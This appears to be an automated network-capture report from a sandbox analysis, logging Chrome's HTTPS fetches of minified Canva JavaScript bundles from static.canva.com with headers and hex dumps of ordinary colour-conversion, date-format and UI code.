                                                                                                                                                                                                                                                                    Data Ascii: Ma:b}){const {mcb:c,Hmb:d,uma:e,gp:f,setup:g}=C5c({Qd:a,Eib:()=>b.Ya,QS:!0});a=c();const {YP:h,lO:k}=q5c({fna:a});a=d.map(([l,m])=>({YW:l,callback:m}));return{YP:h,uma:e,gp:{get qI(){return f.qI}},GBa:function(){return g()},VE:a,lO:k}};E5c=function(){var


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    63192.168.2.1249787104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC615OUTGET /web/a121920226a20c53.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 9796
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951169bca4237-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b5fb8d5067f40cb9cc45ad4c09f97a47"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:20 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: JWi4ka2/z63hRS5p7vRWP0hU5dNiPeg5ea5mcriODydspF2r13qTrjDnwvf6FqaaaZ1DeCywmbw=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TSHCZD1PV8646
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: G1QLA2cFgpeq7vnU51IX7weOShdiYqEc
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4a 70 25 32 46 4f 25 32 42 39 70 47 25 32 46 6c 48 70 54 50 57 36 48 4f 48 36 4f 4e 30 53 75 33 4b 43 76 62 78 55 4a 31 52 5a 6f 6d 47 43 6c 25 32 46 46 4a 42 77 6a 64 6d 6f 4a 7a 6f 70 56 6d 51 45 41 6e 67 78 53 41 6a 57 67 32 70 6c 33 55 4b 58 35 4f 72 38 46 74 71 48 7a 51 68 50 36 4f 33 31 6d 78 31 61 6f 4c 78 6e 67 4d 25 32 42 56 48 52 5a 64 4e 50 31 36 58 32 52 6a 74 73 44 49 41 49 31 66 50 6d 6e 56 6a 51 77 45 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jp%2FO%2B9pG%2FlHpTPW6HOH6ON0Su3KCvbxUJ1RZomGCl%2FFJBwjdmoJzopVmQEAngxSAjWg2pl3UKX5Or8FtqHzQhP6O31mx1aoLxngM%2BVHRZdNP16X2RjtsDIAI1fPmnVjQwEg%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1195INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 34 39 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 39 33 37 36 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6499],{/***/ 293763:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 2e 39 32 3a 28 28 61 2b 2e 30 35 35 29 2f 31 2e 30 35 35 29 2a 2a 32 2e 34 3b 63 3d 2e 30 34 30 34 35 3e 3d 63 3f 63 2f 31 32 2e 39 32 3a 28 28 63 2b 2e 30 35 35 29 2f 31 2e 30 35 35 29 2a 2a 32 2e 34 3b 64 3d 2e 30 34 30 34 35 3e 3d 64 3f 64 2f 31 32 2e 39 32 3a 28 28 64 2b 2e 30 35 35 29 2f 31 2e 30 35 35 29 2a 2a 32 2e 34 3b 72 65 74 75 72 6e 20 6e 65 77 20 4d 76 28 31 30 30 2a 28 2e 34 33 36 30 37 34 37 2a 62 2b 2e 33 38 35 30 36 34 39 2a 63 2b 2e 31 34 33 30 38 30 34 2a 64 29 2c 31 30 30 2a 28 2e 32 32 32 35 30 34 35 2a 62 2b 2e 37 31 36 38 37 38 36 2a 63 2b 2e 30 36 30 36 31 36 39 2a 64 29 2c 31 30 30 2a 28 2e 30 31 33 39 33 32 32 2a 62 2b 2e 30 39 37 31 30 34 35 2a 63 2b 2e 37 31 34 31 37 33 33 2a 64 29 29 7d 3b 0a 5f 5f 63 2e 51 76 3d 66 75 6e 63
                                                                                                                                                                                                                                                                    Data Ascii: .92:((a+.055)/1.055)**2.4;c=.04045>=c?c/12.92:((c+.055)/1.055)**2.4;d=.04045>=d?d/12.92:((d+.055)/1.055)**2.4;return new Mv(100*(.4360747*b+.3850649*c+.1430804*d),100*(.2225045*b+.7168786*c+.0606169*d),100*(.0139322*b+.0971045*c+.7141733*d))};__c.Qv=func
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 29 3b 61 3d 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 61 2c 32 35 35 29 2c 30 29 3b 65 3d 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 65 2c 32 35 35 29 2c 30 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 4a 76 28 62 2c 61 2c 65 29 7d 3b 0a 47 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 4f 76 2e 24 46 61 2c 63 3d 4f 76 2e 64 33 61 2c 64 3d 4f 76 2e 63 33 61 2c 65 3d 61 2e 63 62 2c 66 3d 28 65 2b 31 36 29 2f 31 31 36 2c 67 3d 66 2b 61 2e 61 2f 35 30 30 3b 61 3d 66 2d 61 2e 62 2f 32 30 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 4d 76 28 28 67 2a 2a 33 3e 64 3f 67 2a 2a 33 3a 28 31 31 36 2a 67 2d 31 36 29 2f 63 29 2a 62 2e 78 2c 28 65 3e 63 2a 64 3f 28 28 65 2b 31 36 29 2f 31 31 36 29 2a 2a 33 3a 65 2f 63 29 2a 62 2e 79 2c
                                                                                                                                                                                                                                                                    Data Ascii: );a=Math.max(Math.min(a,255),0);e=Math.max(Math.min(e,255),0);return new Jv(b,a,e)};GLa=function(a){const b=Ov.$Fa,c=Ov.d3a,d=Ov.c3a,e=a.cb,f=(e+16)/116,g=f+a.a/500;a=f-a.b/200;return new Mv((g**3>d?g**3:(116*g-16)/c)*b.x,(e>c*d?((e+16)/116)**3:e/c)*b.y,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 72 6e 5b 63 2b 28 62 2d 63 29 2a 61 5b 30 5d 2c 63 2b 28 62 2d 63 29 2a 61 5b 31 5d 2c 63 2b 28 62 2d 63 29 2a 61 5b 32 5d 5d 7d 3b 0a 5f 5f 63 2e 61 77 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 61 2e 61 2c 64 3d 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 4a 76 3f 31 3a 62 2e 61 2c 65 3d 63 2b 64 2a 28 31 2d 63 29 3b 69 66 28 30 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6e 65 77 20 5f 5f 63 2e 4b 76 28 30 2c 30 2c 30 2c 30 29 3b 63 6f 6e 73 74 20 66 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 61 2e 72 2a 63 2b 62 2e 72 2a 64 2a 28 31 2d 63 29 29 2f 65 29 2c 67 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 61 2e 67 2a 63 2b 62 2e 67 2a 64 2a 28 31 2d 63 29 29 2f 65 29 3b 61 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 61 2e 62 2a 63 2b 62 2e 62 2a 64 2a 28
                                                                                                                                                                                                                                                                    Data Ascii: rn[c+(b-c)*a[0],c+(b-c)*a[1],c+(b-c)*a[2]]};__c.aw=function(a,b){const c=a.a,d=b instanceof Jv?1:b.a,e=c+d*(1-c);if(0===e)return new __c.Kv(0,0,0,0);const f=Math.round((a.r*c+b.r*d*(1-c))/e),g=Math.round((a.g*c+b.g*d*(1-c))/e);a=Math.round((a.b*c+b.b*d*(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 5f 63 2e 63 61 28 36 32 29 3b 0a 5f 5f 63 2e 4b 76 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 4b 64 61 28 61 29 7b 72 65 74 75 72 6e 20 49 76 2e 4b 64 61 28 61 29 7d 4e 74 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 4a 76 28 74 68 69 73 2e 72 2c 74 68 69 73 2e 67 2c 74 68 69 73 2e 62 29 7d 73 4e 28 29 7b 72 65 74 75 72 6e 20 49 76 2e 73 4e 28 74 68 69 73 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 29 7b 74 68 69 73 2e 72 3d 61 3b 74 68 69 73 2e 67 3d 62 3b 74 68 69 73 2e 62 3d 63 3b 74 68 69 73 2e 61 3d 64 3b 74 28 30 3c 3d 61 26 26 32 35 35 3e 3d 61 2c 22 69 6e 76 61 6c 69 64 20 72 3a 20 7b 7d 22 2c 61 29 3b 74 28 30 3c 3d 62 26 26 32 35 35 3e 3d 62 2c 22 69 6e 76 61 6c 69 64 20 67 3a 20 7b 7d 22 2c 62 29 3b 74 28 30 3c 3d 63 26 26 32 35
                                                                                                                                                                                                                                                                    Data Ascii: _c.ca(62);__c.Kv=class{static Kda(a){return Iv.Kda(a)}Nt(){return new Jv(this.r,this.g,this.b)}sN(){return Iv.sN(this)}constructor(a,b,c,d){this.r=a;this.g=b;this.b=c;this.a=d;t(0<=a&&255>=a,"invalid r: {}",a);t(0<=b&&255>=b,"invalid g: {}",b);t(0<=c&&25
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 61 74 69 63 20 73 4e 28 61 29 7b 72 65 74 75 72 6e 60 72 67 62 61 28 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 61 2e 72 29 7d 2c 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 61 2e 67 29 7d 2c 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 61 2e 62 29 7d 2c 24 7b 61 2e 61 7d 29 60 7d 7d 3b 5f 5f 63 2e 59 76 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 4e 74 28 61 29 7b 72 65 74 75 72 6e 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 4d 76 3f 57 76 28 61 29 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 5f 63 2e 50 76 3f 57 76 28 47 4c 61 28 61 29 29 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 5f 63 2e 53 76 3f 28 61 3d 46 4c 61 28 61 29 2c 57 76 28 47 4c 61 28 61 29 29 29 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 5f 63 2e 54 76 3f 5f 5f 63 2e 52 76 28 61 29 3a 22 73 74 72 69 6e
                                                                                                                                                                                                                                                                    Data Ascii: atic sN(a){return`rgba(${Math.round(a.r)},${Math.round(a.g)},${Math.round(a.b)},${a.a})`}};__c.Yv=class{static Nt(a){return a instanceof Mv?Wv(a):a instanceof __c.Pv?Wv(GLa(a)):a instanceof __c.Sv?(a=FLa(a),Wv(GLa(a))):a instanceof __c.Tv?__c.Rv(a):"strin
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 6d 2f 70 6d 22 29 3b 76 61 72 20 66 3d 62 3f 62 2e 72 65 70 6c 61 63 65 28 53 4c 61 2c 22 22 29 3a 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 68 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6b 3d 30 3b 6b 3c 61 2e 6c 65 6e 67 74 68 3b 6b 2b 3d 32 29 7b 76 61 72 20 67 3d 61 5b 6b 5d 3b 63 6f 6e 73 74 20 6c 3d 61 5b 6b 2b 31 5d 3b 73 77 69 74 63 68 28 67 29 7b 63 61 73 65 20 22 64 64 64 22 3a 63 61 73 65 20 22 64 64 64 64 22 3a 68 2e 70 75 73 68 28 7b 6b 69 6e 64 3a 22 77 65 65 6b 64 61 79 22 2c 66 6f 72 6d 61 74 3a 22 64 64 64 22 3d 3d 3d 67 3f 22 73 68 6f 72 74 22 3a 22 6c 6f 6e 67 22 2c 73 65 70 61 72 61 74 6f 72 3a 6c 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 6d 6d 6d 22 3a 63 61 73 65 20 22 6d 6d 6d 6d 22 3a 68 2e 70 75 73 68 28 7b 6b 69 6e 64 3a 22 6d 6f 6e 74
                                                                                                                                                                                                                                                                    Data Ascii: m/pm");var f=b?b.replace(SLa,""):void 0;const h=[];for(let k=0;k<a.length;k+=2){var g=a[k];const l=a[k+1];switch(g){case "ddd":case "dddd":h.push({kind:"weekday",format:"ddd"===g?"short":"long",separator:l});break;case "mmm":case "mmmm":h.push({kind:"mont
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC387INData Raw: 20 6d 6d 6d 6d 20 79 79 3b 64 64 20 6d 6d 6d 6d 20 79 79 79 79 3b 64 64 2d 6d 6d 6d 2d 79 79 3b 64 64 2d 6d 6d 6d 2d 79 79 79 79 3b 64 64 2d 6d 6d 6d 6d 2d 79 79 3b 64 64 2d 6d 6d 6d 6d 2d 79 79 79 79 3b 6d 6d 2f 79 79 3b 6d 6d 2f 79 79 79 79 3b 6d 6d 6d 20 79 79 3b 6d 6d 6d 20 79 79 79 79 3b 6d 6d 6d 6d 20 79 79 3b 6d 6d 6d 6d 20 79 79 79 79 3b 64 64 20 6d 6d 6d 3b 64 64 20 6d 6d 6d 6d 3b 6d 6d 6d 20 64 64 3b 6d 6d 6d 6d 20 64 64 3b 64 64 2d 6d 6d 3b 6d 6d 2d 64 64 3b 64 64 2f 6d 6d 3b 6d 6d 2f 64 64 3b 79 79 79 79 3b 6d 6d 6d 6d 3b 6d 6d 6d 3b 68 3a 6d 6d 3a 73 73 20 61 6d 2f 70 6d 3b 68 68 3a 6d 6d 20 61 6d 2f 70 6d 3b 68 20 61 6d 2f 70 6d 3b 68 68 3a 6d 6d 3b 68 68 3a 6d 6d 3a 73 73 22 2e 73 70 6c 69 74 28 22 3b 22 29 2e 6d 61 70 28 61 3d 3e 5f 5f 63
                                                                                                                                                                                                                                                                    Data Ascii: mmmm yy;dd mmmm yyyy;dd-mmm-yy;dd-mmm-yyyy;dd-mmmm-yy;dd-mmmm-yyyy;mm/yy;mm/yyyy;mmm yy;mmm yyyy;mmmm yy;mmmm yyyy;dd mmm;dd mmmm;mmm dd;mmmm dd;dd-mm;mm-dd;dd/mm;mm/dd;yyyy;mmmm;mmm;h:mm:ss am/pm;hh:mm am/pm;h am/pm;hh:mm;hh:mm:ss".split(";").map(a=>__c


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    64192.168.2.1249788104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC615OUTGET /web/fbc5f28f9cb20366.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:42 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 24352
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59511bedd0c3f0-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49982
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b6bd953d37aa2ec727eac3cfe20081de"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:28 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:25 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 8LoqSemw8LUv3qkfDDvFyJX4ZEHIw4ebnmhjQQdpoaLMYZsanUH6S/dyhBehxfxvOLNT3jcjXDc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HQ6YNF45RPW7S
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: V5Ayj17F_0C_t9cTRFJhjk3KeEsidnj0
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 45 4b 6e 25 32 42 77 63 65 30 51 51 44 33 6b 32 72 36 25 32 42 4a 36 70 46 25 32 46 42 49 4c 69 54 55 4b 31 70 52 79 41 68 4b 6c 6f 67 46 45 43 56 62 51 4f 66 4c 43 48 49 39 58 78 4d 6e 49 72 4a 32 41 36 46 58 39 54 58 42 71 68 6d 4d 37 55 39 35 6d 79 30 6a 73 34 39 51 33 52 30 62 6c 32 71 5a 5a 4d 49 25 32 42 56 64 42 73 6f 46 32 52 6d 7a 30 5a 77 34 67 63 34 6d 62 71 71 77 76 4a 49 56 41 4e 57 65 57 51 41 61 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKn%2Bwce0QQD3k2r6%2BJ6pF%2FBILiTUK1pRyAhKlogFECVbQOfLCHI9XxMnIrJ2A6FX9TXBqhmM7U95my0js49Q3R0bl2qZZMI%2BVdBsoF2Rmz0Zw4gc4mbqqwvJIVANWeWQAaw%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 33 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 39 31 39 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34 35
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9630],{/***/ 79194:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 74 3b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 62 3d 3e 7b 22 54 61 62 22 3d 3d 3d 62 2e 6b 65 79 26 26 5f 5f 63 2e 75 69 2e 7a 7a 28 22 6b 65 79 62 6f 61 72 64 22 29 7d 2c 21 30 29 3b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 28 29 3d 3e 5f 5f 63 2e 75 69 2e 7a 7a 28 22 6d 6f 75 73 65 22 29 2c 21 30 29 3b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 28 29 3d 3e 5f 5f 63 2e 75 69 2e 7a 7a 28 22 6d 6f 75 73 65 22 29 2c 21 30 29 7d 3b 75 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3d 5b 22 61 75 74 6f 22 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 6f 66 20 61 29 7b 69 66 28 63 2e 69 6e 63 6c 75 64
                                                                                                                                                                                                                                                                    Data Ascii: t;a.addEventListener("keydown",b=>{"Tab"===b.key&&__c.ui.zz("keyboard")},!0);a.addEventListener("mousedown",()=>__c.ui.zz("mouse"),!0);a.addEventListener("touchstart",()=>__c.ui.zz("mouse"),!0)};uqa=function(a){let b=["auto"];for(const c of a){if(c.includ
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 6a 7c 7c 62 2e 75 70 3b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 74 69 6e 79 22 3a 72 65 74 75 72 6e 5b 62 2e 75 70 7c 7c 63 2c 22 52 33 42 55 70 77 20 64 6b 57 79 70 77 22 5d 3b 63 61 73 65 20 22 73 6d 61 6c 6c 22 3a 72 65 74 75 72 6e 5b 62 2e 73 6d 61 6c 6c 7c 7c 63 2c 22 75 52 57 78 56 41 20 64 6b 57 79 70 77 22 5d 3b 63 61 73 65 20 22 6d 65 64 69 75 6d 22 3a 72 65 74 75 72 6e 5b 62 2e 6d 65 64 69 75 6d 7c 7c 63 2c 22 4e 41 5f 49 6d 67 20 64 6b 57 79 70 77 22 5d 3b 63 61 73 65 20 22 6c 61 72 67 65 22 3a 72 65 74 75 72 6e 5b 62 2e 6f 6a 7c 7c 63 2c 22 4a 52 6b 7a 32 41 20 64 6b 57 79 70 77 22 5d 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 5f 5f 63 2e 42 28 61 29 3b 7d 7d 3b 0a 79 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: j||b.up;switch(a){case "tiny":return[b.up||c,"R3BUpw dkWypw"];case "small":return[b.small||c,"uRWxVA dkWypw"];case "medium":return[b.medium||c,"NA_Img dkWypw"];case "large":return[b.oj||c,"JRkz2A dkWypw"];default:throw new __c.B(a);}};yqa=function(a){con
